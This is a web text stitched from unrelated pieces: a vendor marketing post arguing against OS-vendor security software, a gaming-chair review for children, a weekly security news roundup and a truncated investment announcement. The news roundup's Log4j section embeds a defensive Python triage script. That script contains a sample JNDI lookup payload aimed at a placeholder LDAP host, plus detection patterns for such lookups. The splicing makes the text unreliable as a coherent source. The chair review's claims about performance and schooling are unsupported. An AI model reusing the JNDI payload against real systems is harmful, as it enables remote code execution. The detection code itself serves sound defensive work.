Why Your Operating System Isn’t Your Cybersecurity Friend

The primary objective of information security is to reduce the risk that cyber threats pose to an organization. To achieve that, security leaders aim to make informed decisions that allow their organization to best protect against, detect, respond to, and recover from cyber threats. Therefore, when looking to reduce risk, security leaders often choose to reduce their enterprise architecture's and procedures' dependence on any single vendor or capability.

That strategy makes good sense, but what about when you are considering security software? Some believe that OS vendor-supplied security software must be “safer” or less risky than that of 3rd party vendors. After all, this line of thinking goes, who knows the OS better than those who developed it?

Yet choosing security software sold by your operating system vendor increases your dependency on a single vendor, and in some of the most security-critical areas, too. In this post, we’ll review the pros and cons of relying on your OS vendor for security software, and we’ll take a look at what 3rd party vendors offer that an OS vendor cannot.

Security and Operating Systems | Expertise Matters

It goes without saying that the developer of any software knows that software best – they are, after all, the owners of the source code – but we are where we are in cybersecurity in no small part because developers frequently fail to understand the security implications of their own products.

Responsible software companies implement bug bounty programs to invite external security specialists to audit their software, and this is no less true of OS vendors like Microsoft, Google, Apple and Red Hat than it is of browser developers and, indeed, security software vendors. The more complex a piece of software, the more likely it is to contain vulnerabilities, a fact borne out by recent CVE statistics for Microsoft Windows, for example.

  • In 2020, Microsoft confirmed 1,220 new vulnerabilities impacting its products, a 60% increase on the previous year.
  • 807 of those 1,220 vulnerabilities were associated with Windows 10, with 107 of those related to code execution, 105 to overflows, 99 to information disclosure, and 74 to privilege escalation.
  • In 2021, 836 new vulnerabilities have been confirmed so far, 455 of which impact Windows 10 and 107 of which allow code execution.
While this data refers to the most recent vulnerabilities, it’s also important to understand that many old vulnerabilities are still actively exploited by threat actors.

Operating system software is, and will remain, a rich source of security vulnerabilities. Across Microsoft products, it is the Windows operating system where most security bugs are found, and Microsoft also accounts for more publicly reported zero-days than any other operating system vendor. More alarming still, most of these vulnerabilities are elevation of privilege or remote code execution bugs: high-risk vulnerabilities that threat actors can and do use to compromise organizations.

When a vendor is dealing with such an overwhelming number of CVEs across so many different product lines, increasing your dependency on yet more products from that vendor deserves a moment's thought.

How much time and effort can the OS vendor devote to ensuring that vulnerabilities in its security software offering are found and dealt with in a timely manner? A 3rd party vendor with a much smaller portfolio and expertise in security itself may be much better placed to provide a reliable and effective security solution than an OS vendor with other priorities.

Moreover, with such a huge code base containing potentially vulnerable code, dependencies inside OS vendor products can present attackers with unexpected opportunities. For example, in 2021 SentinelLabs disclosed a simple privilege escalation bug, CVE-2021-24092, in a driver shipped with Windows Defender that had been in the code since 2009. See the SentinelLabs write-up “CVE-2021-24092: 12 Years in Hiding: A Privilege Escalation Vulnerability in Windows Defender” for the details.

As we have seen, just because an OS vendor knows their own product better than anyone else, it doesn’t follow that they are best placed to understand or even deal with the security implications of that software. And the bigger and more complex the software, the more true that is going to be.

When you add all this together, it raises a troubling thought: is the vendor that is likely the source of the most vulnerabilities in your environment really the vendor you want to select for cybersecurity?

Nonetheless, perhaps there is another good argument for preferring security software from an OS vendor over a dedicated security solutions specialist: if one were looking for a turnkey solution, wouldn't the OS vendor's own security offering be less hassle than installing a security solution from a third party vendor?

There are a number of issues to consider here; installation, licensing, cost, ease-of-use, integration, and, ultimately, the effectiveness of the protection.

E5 Licensing Complexities | What’s Not Included In The Box

Among the major OS vendors, Microsoft is unique in having chosen to develop and sell a product to protect its own operating system software. Arguably, there is a conflict of interest in a software company looking to build revenue by marketing a security product to protect its other products, and potential customers might wonder whether the engineering effort expended there would have been better spent on directly securing those products.

Even if organizations choose to pay the premium and procure Microsoft 365 E5 Security, Enterprise Mobility and Security E5, or Windows E5 licenses, they often discover after the fact that they still require additional 3rd-party products to cover gaps in Microsoft's security portfolio:

  • When it comes to Extended Detection and Response (XDR) solutions, the general consensus in the industry is that a solution must be able to ingest 3rd-party data in order to perform cross-workload analytics and response actions. At the time of writing, Microsoft 365 Defender cannot ingest 3rd-party data, so organizations are left with a technology that can only process its own dataset and therefore only protect the limited scope of Microsoft solutions.
  • Microsoft's Endpoint Protection Platform (EPP) and Endpoint Detection and Response (EDR) offering is called Microsoft Defender for Endpoint. The solution continues to fall short in several critical areas, including detection quality, automatic remediation of cyber threats on non-Windows 10 endpoints, and 1-click recovery from cyber threats.

Many customers evaluating Microsoft alongside SentinelOne consistently say that Microsoft's “With E5 you have everything you need” claim turned out to be inaccurate. Once they began their evaluations, the gaps became apparent, and those gaps are compounded over time as Microsoft introduces additional niche products.

For example, Microsoft recently made the decision not to support Kubernetes clusters and containers with Microsoft Defender for Endpoint; instead, they announced Microsoft Defender for Containers, yet another product which is not included in E5 and which again requires additional licenses, procurement, and deployment.

Beyond that, the procurement process can quickly become very complex as all the different products are spread across dozens of different licensing models in Microsoft Azure, Microsoft Windows, and Microsoft 365.

Some of these licensing models are per endpoint, others per user, and still others are pay-as-you-go. This plethora of offerings can make it extremely difficult to predict the actual cost of the platform for a business with multiple, complex needs.

In contrast, a solution like the Singularity platform has a very simple, straightforward licensing model where customers can choose between:

  • Singularity Core – On-device NGAV with autonomous behavioral AI that does not rely on the cloud to detect, prevent and remediate file-based and fileless attacks, including ransomware.
  • Singularity Control – Singularity Core with additional endpoint control capabilities like firewall, device control, and more.
  • Singularity Complete – Singularity Control with additional Endpoint Detection and Response (EDR), Cloud Workload Security, and Network Security capabilities.

All three options are licensed in a subscription model per agent/month, with no hidden costs.

Ease of Use and Integration

It’s a natural and expected consequence of using software from one vendor that, where they have other offerings, they will try to encourage take up of their other products. But one of the most important things for an enterprise when choosing security software is how it can reduce risk, decrease dependencies, and easily integrate with the rest of the security stack.

With Singularity XDR, organizations are able to gain unified visibility across their technology ecosystem, and benefit from unparalleled data analytics with centralized cross-workload response actions.

With this approach, SentinelOne customers have the flexibility they need in order to choose a best-of-breed strategy while being able to centralize into a unified security platform.

In contrast, Microsoft's approach pushes organizations into a closed ecosystem, which means increasing dependency on a single vendor that can quickly become a single point of failure.

The Ultimate Test: Who Protects Best?

Every vendor will tell you they are better than the competition, so it's vital for security leaders to look at independent 3rd-party evaluations when comparing security products.

The most recent MITRE Engenuity ATT&CK Evaluation is a good place to start.

Despite the fact that the simulation took place predominantly on Windows, Microsoft's own security product still had 23 missed detections. During the test, Microsoft paused the evaluation 35 times to make configuration changes, including to its detection logic: a luxury an organization does not have during a real-world cyber-attack.

In comparison, SentinelOne had zero misses, zero configuration changes, and 100% visibility.

Taking Advantage of a Best-of-Breed Approach

Security leaders aware of the pitfalls we’ve mentioned above are choosing a best-of-breed approach and bringing in security-first vendors to partner with for their security requirements.

With Singularity, SentinelOne provides a best-in-class Extended Detection and Response (XDR) platform that extends protection from the endpoint and beyond with visibility, proven protection, and unparalleled response:

  • One security console: Built for centralized & intuitive operations. Whether SOC analysts are chasing bad actors or security administrators need to configure device control policies, all can be achieved in one console.
  • Best-in-class EPP + EDR for modern threats: Every endpoint is equipped to prevent and detect with robust static & behavioral AI, even when offline.
  • Consistency: SentinelOne provides you consistency in terms of what features are available and ensures feature parity across Windows, macOS, and Linux.
  • Time-saving automation: Automatic attack reconstruction with Storyline™ technology, autonomous & 1-click remediation and patented rollback, and dedicated in-house experts for MDR, DFIR, and threat hunting.

Conclusion

Cybersecurity is all about managing risk as effectively as possible. There is no organization in the world that is immune to cyber threats. Over the years, security leaders have been required to make a choice between best-of-suite or best-of-breed approaches for their technology stack.

With the increasing complexity of cyber threats, the steady rise in cyberattacks, and growing dependence on operating system vendors, organizations are looking to partner with security-first companies that can provide a holistic approach to security.

If you would like to learn more about how SentinelOne can reduce cyber risk across your entire organization – Windows, Linux, macOS, IoT, mobile and cloud workloads – contact us or request a free demo.

X Rocker Gaming Chairs For Kids – Are They Worth A Buy?

If you’re on the hunt for a gaming chair for your little one, there are a few things you should consider before making your purchase. X Rocker Gaming Chairs have become quite popular in recent years, but are they worth the investment?
Many kids dream of having the coolest gaming chair – and X Rocker Gaming Chairs are undoubtedly high on that list. But are they worth the money?

Why do kids need a gaming chair?

As you know, kids can spend hours playing video games. Unfortunately, they spend most of that time seated, leading to all kinds of posture problems.

A gaming chair is a perfect way to prevent these problems, as it keeps the spine in a neutral position. This is essential for growing bodies, as it helps them develop properly.

There are several models of gaming chairs for kids, but they all have one thing in common: they support your back and neck, so you can enjoy playing games without feeling any discomfort.

But it’s not just about offering comfort. A gaming chair is also one of the best ways to improve your performance when playing video games. You can lean back in this chair or lift your feet and place them on the rests without any problem – all while you’re focused on winning!

Why are X Rocker Gaming Chairs so popular?

X Rocker Gaming is a company that specializes in gaming accessories, such as wireless headphones and chairs for playing video games. They offer products that anyone can use- from professional gamers to casual players – and even children.

One of the reasons why their gaming chairs are so popular is that they come with many features. For example, the X Rocker Gaming Chair for Kids has built-in speakers that will immerse your child in the game. It also has a comfortable headrest and backrest to ensure your child stays seated for hours on end.

Another popular feature is the fact that most of these chairs are wireless. This means that you don’t have to worry about getting tangled in cables while you’re trying to concentrate on the game.

It is, therefore, no wonder that many parents are looking for X Rocker Gaming Chairs For Kids to help them play video games in the best possible conditions.

The X Rocker Gaming chairs are designed to be comfortable and improve your gaming experience. And, because they’re so popular, you can find a variety of models and designs to choose from.

What should you look for when buying an X Rocker Gaming Chair?

When looking for an X Rocker Gaming Chair, you should keep a few things in mind. As we mentioned before, these chairs are designed for comfort and to improve your playtime – so you should look for one that has all of the features you need.

Some of the features you should consider before buying include:

  • Number and positioning of speakers. The more speakers your chair has, the better it will sound – which is essential for immersing yourself in the game.
  • Comfort. You should check to make sure that the seat is comfortable enough to sit on for hours at a time and that it has excellent lumbar support.
  • Wireless technology. This is a must-have feature, as it will keep you from getting tangled in cables.
  • Style and design. You should choose a chair that matches your personality and gaming style.

On top of the features mentioned above, there are a few more things to think of since the gaming chair is for kids.

  • The chair should be lightweight, so your child can move it with ease after playing and prevent injuries when they pick it up.
  • The armrests should be adjustable because their size will change as time passes (and as your child grows).
  • You should make sure that the chair is easy to clean in case of any spills.
  • The chair should also have a warranty if something goes wrong with it.
  • The most important thing you should consider when buying an X Rocker Gaming Chair for your child is that the chair will fit them. It doesn’t matter how good the chair is – if it’s too small or too big, your child won’t be able to use it for as long as they should.

When looking for an X Rocker Gaming Chair, keep all of these factors in mind to ensure you’re getting the best possible product for your needs. And don’t forget to take into account your child’s specifics – their favorite color, for example.

The best X Rocker Gaming Chairs – the guide

In this guide, we’ll be talking about the different options you have when it comes to X Rocker Gaming Chairs For Kids. You will be able to compare the different models and prices, to make a wise choice when purchasing one of these chairs.

Floor Rocker Gaming Chairs

Floor gaming chairs are a great choice because they will keep your kids off the ground and offer a comfortable gaming experience.

These chairs are designed to be used while sitting on the floor – which offers a low-profile design and lots of stability.
Some of the best X Rocker Floor Gaming Chairs include:

X Rocker Surge Floor Gaming Chair

The X Rocker Surge is an excellent chair for both kids and adults. With its powerful subwoofer and two front-facing speakers, you’ll get exceptional sound and a slight rumble, emphasizing your game, movie, or music. You can play audio from any Bluetooth-enabled device wirelessly through the chair.

X Rocker Surge includes a cushioned backrest and arms for maximum comfort when gaming. The chair is covered in durable black vinyl and has a weight capacity of 275 pounds.

The audio control is located on the side of the chair and includes easy access volume, bass, and vibration controls. X Rocker Surge comes with a wireless receiver that you can plug into any RCA output jack on your TV or stereo system, making it great for gaming on your home theater system. The chair also folds up for easy storage and transport.

Dimensions: 36.81″D x 32.28″W x 20.89″H

X Rocker II SE Floor Gaming Chair

The X Rocker II SE is a comfortable and stylish gaming chair that’s great for playing video games, watching movies, or listening to your favorite tunes.

You can play your favorite games without being tangled up in cables with wireless audio. This chair has wireless audio transmission, two speakers near the headrest, and a subwoofer positioned to pound your back with bass-heavy sounds that will enhance your game, movie, or music.

Plug your headphones into the headphone jack and adjust the bass and volume control on the side jack to your liking. The Rocker II SE connects to Xbox, PlayStation, Gameboy, MP3/CD/DVD, and home theater systems.

The chair’s upholstery is black leather-like vinyl and is easy to clean. The X Rocker II SE has a weight capacity of 275 pounds and folds for easy storage.

Dimensions: 27.8″D x 18.5″W x 17.5″H

X Rocker Eclipse Floor Gaming Chair

The X Rocker Eclipse is an excellent choice for kids who want a comfortable gaming experience. The chair has two front-facing speakers to give you an immersive audio experience while gaming.
The sleek rocker design shifts and reclines to give you more comfortable playing positions during your most extended gaming sessions. The chair is covered in durable black vinyl and has a weight capacity of 275 pounds.
The simple design of this gaming chair will fit in any room. The stylish black and silver design complements your home, game room, bedroom, or dorm room with a modern feel.

Dimensions: 31″D x 27.5″W x 16.5″H

X Rocker Flash 2.0 Floor Gaming Chair

This gaming chair has an integrated 2.0 Wired Audio System with headrest-mounted speakers for enhanced immersion in video games. It’s easily connected to most gaming systems – all you have to do is connect it to your device.

The X Rocker Flash 2.0 High Tech Audio Wired Gaming Chair’s rocking design provides smooth movement and reclines for ideal gaming positions throughout your longest missions in the game. This flexible chair is suitable for living rooms, game rooms, bedrooms, dorm rooms, or your favorite gaming area. It is also great for watching movies, reading, and lounging.

Have we mentioned how easy it is to maintain? The Flash 2.0 chair is easy to clean with a simple wipe down. Fold it down for easy storage and transport.

Dimensions: 30.71″D x 16.54″W x 26.77″H

X Rocker Lux 2.0 Floor Gaming Chair

The X Rocker Lux 2.0 Bluetooth is a lightweight yet comfortable floor gaming chair for children and players of all ages.
This chair comes with a discreet headrest-mounted 2.0 Bluetooth sound system that improves your audio experience when playing games, watching films, or listening to music.

This exquisite limited edition folding floor rocker is embellished with an eSports-inspired design and features a rich black and gold faux leather covering for added comfort, as well as a sleek black frame that folds down to store.

Fully-padded arms, a high backrest, and a durable black nylon rocker base are just some of the other features contributing to this chair’s comfortable design.

Dimensions: 31.1″ D x 18.11″ W x 29.72″ H
Weight Limit: 240 lbs

X Rocker Spade Floor Gaming Chair

The X Rocker Spade 2.1 is a portable and foldable rocker chair that can handle all of your gaming requirements; the integrated audio and subwoofer system produces an incredible sound experience while playing games, listening to music, or watching movies. Deep foam padding, which is ergonomically designed and offers long-term comfort while gaming, allows extended gameplay.

The X Rocker Spade 2.1 floor chair has a durable nylon base that allows you to game with precision and accuracy. You can find an ideal position that provides the ultimate playing experience, whether you’re rocking back and forth or staying still; the Spade 2.1’s headrest design will give you access to many different positions.

The foldable and portable design allows for easy transport and storage. This chair can be stored away in a closet, under the bed, or even behind the couch, so you always have a place to sit when it comes to gaming time.

Dimensions: 29.53″D x 16.9″W x 28.15″H

X Rocker Limewire Floor Gaming Chair

The X Rocker Limewire 2.1 BT Floor Rocker is designed for both casual and professional gamers, allowing them to not only hear the game’s noises but also feel them. The game chair is made with high-tech materials, and it has a built-in 2.1 Bluetooth Audio System with headrest-mounted speakers and a subwoofer located at the back to give you the sensation that you’re in the game.

The chair is compatible with various gaming systems and wireless devices, allowing you to enjoy video games, movies, music, and more.

The adjustable armrests on the rocking design with cushioned resting supports allow you to play in several positions throughout your most prolonged gaming sessions. The modern black and green pattern fits in well with most décor styles.

Measurements: 36.2″D x 31.5″W x 20.8″H

X Rocker Pro Series H3 Floor Gaming Chair

The ultimate all-purpose gaming chair! A leather lounging game chair may be used to play video games, watch movies and TV, listen to music, read, and unwind.

Four forward-pointing speakers, audio force modulation technology, and ported power subwoofers are combined in the chair’s open area for complete immersion in your gaming, movie, or music experience.

The Pro Series H3 has extra vibration motors that sync with your music’s bass tones to deliver an even more powerful whole-body feeling that will keep you comfortable and amused for hours.

This gaming chair is compatible with all gaming consoles. It comes with a built-in amplifier for high-quality sound, speakers flanked on both sides of the chair, and controls for volume, bass, and vibration.

The X Rocker Pro Series H3 is made of durable wood and metal frame covered with padded vinyl. The weight capacity is 275 pounds.

Dimensions: 35″D x 22″W x 34.5″H

X Rocker Emerald RGB Floor Gaming Chair

This sophisticated chair has an integrated 2.0 Wired Audio System with headrest-mounted speakers and a backrest subwoofer to immerse you in the game.

The chair’s high-quality hooded design, complete with a softly curved armrest and backrest, makes it stylish and comfortable. It also has RGB LED technology built-in for lighting effects that can be modified using the touch of a button.

Although this gaming chair is not wireless, it does have a built-in headphone jack and volume control for personal listening. With a weight capacity of 250 pounds, the X Rocker Emerald RGB is great for both children and adults.

Measurements: 30.3″D x 26.4″W x 22.2″H

X Rocker Extreme III Floor Gaming Chair

The X Rocker Extreme is great for gaming, watching movies and TV shows, and listening to music. A built-in 2.1 Speaker System with a subwoofer and amplifier puts out 30 watts of sound for impactful bass and overall audio quality.

The unique, full-bodied sound system chair provides you with total media immersion and has been carefully built to boost the sound quality and enhance your experience.

The X Rocker’s speakers and its ported power subwoofers are boosted by the open area inside the X Rocker rather than simply the frame, resulting in improved sound quality.

The chair has a sturdy wood frame and is covered with durable faux leather for optimal comfort. It provides excellent support, making it great for people of all ages and sizes. The weight capacity is 275 pounds.

Dimensions: 26″D x 17.5″W x 17″H

X Rocker Pedestal Chairs

Not all want to sit that close to the floor, and that’s ok! If you are looking for a gaming chair in a more traditional form, The X Rocker Pedestal Chairs might be exactly what you’re looking for!

X Rocker Vibe Gaming Chair

With a beautiful, breathable fabric back and seat, this high-back tilt & swivel pedestal gaming chair may be used to play video games, watch movies, listen to music, read, and unwind. You will not want to get up!
Integrated with two 2.0 speakers and a powerful subwoofer, the X Rocker Vibe creates an experience that will keep you captivated and relaxed for hours on end.
Vibe 2.1 Bluetooth Pedestal Gaming Chair has extra vibration motors that sync with your audio’s bass tones to provide an even more powerful full-body sensation, keeping you comfortable and engaged at the same time.
The chair’s ergonomic design includes a headrest and lumbar support for additional comfort. The X Rocker Vibe can be used with all gaming consoles and has a weight capacity of 250 pounds.

Dimensions: 33.86″D x 40.55″W x 23.62″H

X Rocker Covert Gaming Chair

This chair is designed for the modern gamer. It has a sleek, low-profile design and is made of vinyl and metal. The Covert is lightweight and easy to move around, making it perfect for use at home or LAN parties.

The built-in 2.1 audio system provides high-quality sound and powerful bass. At the same time, the included wireless transmitter allows you to connect wirelessly to your game console or PC. 2 subwoofers make sure that you will feel that bass!

The unique design adjusts to your body rather than forcing you to change, providing superior comfort. Lumbar and neck support for extra comfort make it ideal for long-haul missions in the game.

Dimensions: 30.71″D x 25.19″W x 37.6″H

X Rocker Falcon Gaming Chair

The low-slung X Rocker Falcon Pedestal is as ergonomic as gaming chairs get, although it sits somewhat lower than most others on the market – therefore, it is more suitable for children.

On the other hand, the distinctive design provides maximum stability thanks to the enormous pedestal base. The use of a lumbar roll relieves pressure on the spine, allowing for more blood flow and nutrients to reach the lower back. In addition, it minimizes fatigue and soreness by extending blood flow and nutrient availability. The X Rocker Falcon is comfortable and safe for developing gamers.

What about the other technical specifications of the X Rocker Falcon? The 2.1 wireless integrated sound system is one of the appealing aspects of the Falcon Pedestal Gaming Chair. There are speakers in the seat and a rear-mounted subwoofer to make you feel like you're actually inside the game. The whole set is mounted on a unique pedestal base with good stability and an enormous surface area.

The X Rocker Falcon Pedestal offers three different sound options: Bluetooth, RCA (stereo), and headphone jacks (3.5mm). The wireless RCA or stereo jack connectivity ensures that you can connect the device to your favorite gaming console, laptop, or media player. The X Rocker Falcon Pedestal Gaming Chair is designed to work with almost every operating system available.

Dimensions: 32″D x 25″W x 42″H

X Rocker Mammoth Gaming Chair

The X Rocker Mammoth has a durable faux leather covering and an ultra-padded seat. Because of that, it is one of the most comfortable gaming chairs on the market.

In addition, it comes with a built-in 2.1 amplifier for high-quality sound, speakers on either side of the chair, and has controls for bass, volume, and vibration. With the top-of-the-line 2.1 Dual audio system, you may link to all of your favorite gaming systems, including PlayStation 4, Xbox One, and Nintendo Switch. The sound-reactive vibration motors add to your gaming experience, while an elevated pedestal base keeps you off the floor for extended periods of fun and entertainment.

The X Rocker Mammoth gaming chair is also built with solid wood and a metal frame that can hold up to 300 pounds.

Measurements: 32″D x 40.9″W x 26″H

X Rocker RGB Prism Gaming Chair

Would your child like a bit of color to the gaming equipment? The surface of X Rocker RGB Prism is illuminated by RGB LED technology and may be customized with over 30 color and pattern options that may all be altered using a touch of a button.

But looks aside, this gaming chair also offers an ergonomic design for superior comfort. The backrest is adjustable to conform to the natural curvature of your spine, and the two speakers are placed on either side to give you an immersive audio experience. The chair is made with a vinyl and metal frame designed to last, and it can hold up to 300 pounds.

The Bluetooth/wireless technology lets you connect to any gaming device in your home, and the 3.5mm stereo jack lets you easily connect to any audio device. The chair also has an integrated control panel to adjust the sound, bass, and vibration.

The X Rocker RGB Prism gaming chair is perfect for children and adults alike, and it can be used with any gaming system.

Measurements: 33″D x 25″W x 45″H

Are X Rocker Gaming Chairs For Kids worth the investment?

X Rocker Gaming Chairs are not cheap. If you’re planning to get one for your child – or even for yourself- you’ll need to be prepared to spend a few hundred dollars on it. However, even if they seem very expensive, you should know that these chairs are built to last.

They’re not only ergonomically designed and incredibly comfortable, but also quite sturdy and very durable. This means the chair won’t tip over or break down easily.

Are X Rocker Gaming Chairs worth it, especially for kids? From our point of view, the answer is definitely “yes”! Not only do these chairs provide great comfort and improve gaming performance, but they’re also built to last. If you’re looking for a gaming chair that will make your child happy and comfortable and give them outstanding performance while playing video games, this is an excellent choice.

A fantastic video game chair can make your kid’s experience much better by enhancing their focus & improving their reaction time (allowing them to respond quickly to winning the game). A video game chair that enhances kids’ performance in school or any other activity is a “must-have” for any parent.


The Good, the Bad and the Ugly in Cybersecurity – Week 51

The Good

Great news this week as details emerged of an operation in which law enforcement arrested 51 individuals accused of illegally trading the personal data of U.S., European and Ukrainian citizens. Cyber cops in Ukraine carried out raids in which around 100 databases containing stolen personal data spanning 2020-2021 were seized.

The databases reportedly contained information on some 300 million citizens of Ukraine, Europe and the United States. Depending on their content, the databases were sold from anywhere between $18 and $1800 a time. Police said they had also shut down a large site where the data was traded and blocked 30 other channels involved in the illegal dissemination of data.

19 suspects have already been charged, with more expected to follow. Ukrainian authorities said that data theft had become increasingly attractive as the number of owners and managers of personal data in the private sector had increased. This presents new challenges as many of these entities struggled with how to prevent and contain data breaches against determined, financially-motivated hackers.

The Bad

“The internet is on fire”, it was declared earlier this week, and the inferno continues to rage in the wake of the Apache Log4j2 vulnerabilities, more formally tracked as CVE-2021-44228 and CVE-2021-45046. Admins everywhere have been scrambling to find out how exposed they are to the critical remote code execution vulnerabilities in Apache’s Java logging library.

The first vulnerability affects Log4j2 versions 2.0-beta9 to 2.14.1. This was patched in version 2.15.0, released this week, but a second vulnerability that could allow a denial of service (DoS) attack in certain non-default configurations was subsequently discovered. That means administrators need to ensure affected products are updated to Log4j2 v2.16.0.

Infosec itself lost no time in coming up with proof-of-concept exploit code, and threat actors were also quick off the mark with cryptominer payloads. In the midst of the panic, predictions of widespread nation-state actor attacks and ransomware incidents have been rife, but none so far have come to light. Expect that to change is the message everyone should be hearing.

Windows and Linux devices are particularly at risk. macOS hasn’t shipped with Java for over a decade, but there are plenty of macOS applications that require a 3rd party JRE, including Crashplan, Ghidra, Jamf Pro and Gradle. Apple’s own Xcode 13.2 also contains a vulnerable version of log4j2, though it’s unclear at this time how that could be exploited.

Organizations are urged to discover all internet-facing assets which use Log4j and that allow data input, to update or isolate those assets, and to monitor for anomalous traffic patterns, particularly around outbound JNDI LDAP/RMI traffic and DMZ-initiated outbound connections.
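The three actions urged above (inventory affected Log4j2 versions, spot lookup strings in request data, review DMZ-initiated outbound LDAP/RMI connections) can be turned into a small triage script. The following is an added example written for this post, not code from SentinelOne or the Log4j project; the version boundaries are the ones named in the text, while the access log lines, the flow records, the zone labels and the addresses (203.0.113.0/24 is a documentation range, 10.0.0.0/8 and friends are assumed internal) are all constructed for illustration.

```python
"""Log4j2 exposure triage: version classification, JNDI lookup detection in
web access logs, and review of DMZ-initiated outbound LDAP/RMI flows.

Added example, not code from the original post. Every log line, flow record
and address below is constructed; adjust INTERNAL_NETS to your own ranges."""
import ipaddress
import re
from typing import Dict, List, Tuple

# major.minor[.patch][-beta N | -rc N], e.g. "2.0-beta9", "2.14.1"
VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(beta|rc)(\d+))?$", re.I)
STAGE = {"beta": 0, "rc": 1, None: 2}  # pre-releases sort before the final build


def parse_version(v: str) -> Tuple[int, int, int, int, int]:
    """Sortable key so that 2.0-beta9 < 2.0-rc1 < 2.0.0 < 2.14.1."""
    m = VERSION_RE.match(v.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {v!r}")
    major, minor, patch, stage, pre = m.groups()
    return (int(major), int(minor), int(patch or 0),
            STAGE[stage.lower() if stage else None], int(pre or 0))


FIRST_AFFECTED = parse_version("2.0-beta9")   # range named in the advisory
LAST_AFFECTED = parse_version("2.14.1")
RECOMMENDED = parse_version("2.16.0")          # fixes both CVEs per the post


def classify_version(v: str) -> str:
    """Map a reported Log4j2 version to the advisory ranges above."""
    key = parse_version(v)
    if key[0] < 2:
        return "log4j 1.x: not covered by these two CVEs, assess separately"
    if key < FIRST_AFFECTED:
        return "below 2.0-beta9: outside the named range"
    if key <= LAST_AFFECTED:
        return "vulnerable to CVE-2021-44228: upgrade to 2.16.0"
    if key < RECOMMENDED:  # 2.15.0
        return "CVE-2021-44228 fixed, CVE-2021-45046 possible in non-default configs: upgrade to 2.16.0"
    return "2.16.0 or later"


# Direct exploitation pattern vs. any other ${...} lookup in request data
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.I)
LOOKUP_RE = re.compile(r"\$\{[^}]*\}")


def scan_access_log(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line_no, verdict) for request log lines carrying lookup syntax.
    'jndi-lookup' is the pattern to act on; 'lookup-syntax' is unusual enough
    in a URI or User-Agent to deserve a look."""
    findings = []
    for n, line in enumerate(lines, 1):
        if JNDI_RE.search(line):
            findings.append((n, "jndi-lookup"))
        elif LOOKUP_RE.search(line):
            findings.append((n, "lookup-syntax"))
    return findings


INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
JNDI_PORTS = {389: "ldap", 636: "ldaps", 1099: "rmi"}


def review_flows(flows: List[Dict]) -> List[Tuple[str, str, str, int, str]]:
    """Flag DMZ-initiated connections to external hosts. LDAP/RMI destinations
    are the classic JNDI callback and get 'high'; anything else 'medium'."""
    out = []
    for f in flows:
        dst = ipaddress.ip_address(f["dst"])
        external = not any(dst in net for net in INTERNAL_NETS)
        if f["zone"] == "dmz" and external:
            svc = JNDI_PORTS.get(f["dport"], "other")
            sev = "high" if svc != "other" else "medium"
            out.append((sev, f["src"], f["dst"], f["dport"], svc))
    return out


SAMPLE_ACCESS_LOG = [  # constructed sample lines
    '10.1.2.3 - - [14/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [14/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:389/a}"',
    '198.51.100.5 - - [14/Dec/2021:10:00:03 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 512 "-" "curl/7.68.0"',
]

SAMPLE_FLOWS = [  # constructed connection records (zone, src, dst, dport)
    {"zone": "dmz", "src": "10.1.2.3", "dst": "203.0.113.7", "dport": 389},
    {"zone": "dmz", "src": "10.1.2.3", "dst": "203.0.113.9", "dport": 443},
    {"zone": "dmz", "src": "10.1.2.3", "dst": "10.0.0.5", "dport": 1099},
    {"zone": "internal", "src": "10.5.5.5", "dst": "203.0.113.7", "dport": 389},
]

if __name__ == "__main__":
    for v in ("2.0-beta9", "2.14.1", "2.15.0", "2.16.0", "1.2.17"):
        print(f"{v:>9} -> {classify_version(v)}")
    print(scan_access_log(SAMPLE_ACCESS_LOG))
    print(review_flows(SAMPLE_FLOWS))
```

The version key treats beta and release-candidate builds as earlier than the final release of the same number, which matters here because the affected range starts at a pre-release. The flow review deliberately reports any DMZ-initiated outbound connection, not just LDAP/RMI, since a callback can be served on an arbitrary port; the port only raises the severity.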

The Ugly

Sometimes, you have to just sit back and admire the dedication of both attackers and defenders to come up with, and discover, novel attacks. This week, hats off to Google’s Project Zero team for reversing and describing one of those “you wouldn’t believe it if it was in a movie” exploits, a nasty, clever, almost-impossible-to-believe exploit of Apple’s iMessage format that was used to target dissidents.

The zero-click exploit, which Project Zero describes as “one of the most technically sophisticated exploits we’ve ever seen”, was developed by the ever-notorious NSO group and sold to unknown regimes around the world. It came to light after Citizen Lab caught the zero-click exploit being used to target a Saudi activist.

The attack begins with a maliciously-crafted PDF file with a .gif file extension being sent to the target. The victim need not read or even open the message; all that is required is that the device receives it. On receipt of the iMessage and fake GIF file, Core Graphics APIs are called into action to parse the file. Here’s where things get crazy.

A zero-day vulnerability (now tracked as CVE-2021-30860) in the open-source PDF parser used by Apple allowed the attackers to construct an entire emulated computer architecture inside the parser’s JBIG2 decompression stream. As explained by Google’s Ian Beer and Samuel Groß:

“Using over 70,000 segment commands defining logical bit operations, they define a small computer architecture…the whole thing runs in this weird, emulated environment created out of a single decompression pass through a JBIG2 stream. It’s pretty incredible, and at the same time, pretty terrifying.”

The full details are well worth a read for anyone interested in just what can be done with what started, after all is said and done, from a simple integer overflow. The resulting exploit, aka FORCEDENTRY, was patched by Apple back in September and affects iOS 14.7 and earlier, all versions of macOS Big Sur prior to 11.6, and watchOS 7.6.1 and earlier.

Reducing Human Effort in Cybersecurity | Why We Are Investing in Torq’s Automation Platform

At SentinelOne, we were delighted to play our part in helping Torq raise $50m in its Series B funding last week. We believe Torq’s no-coding approach to automation will facilitate more complex workflows to respond to threats and play an essential role in developing XDR. Torq is on a mission to reinvent automation for security teams, a mission we at SentinelOne fully support. The importance of automation – of taking human effort out of the security equation – is central to our philosophy.

What is Torq?

Torq is a platform built around world-class automation, best practices templates, connectivity, and data tools. Torq aims to let security professionals connect to any security system needed and easily build automated workflows with a no-code approach.

Automation helps teams do more with limited resources, spend more time on the most valuable work, increase productivity, and reduce burnout, which in turn improves team retention.

Torq and the SentinelOne Platform

SentinelOne customers will find a variety of use-cases for Torq, including:

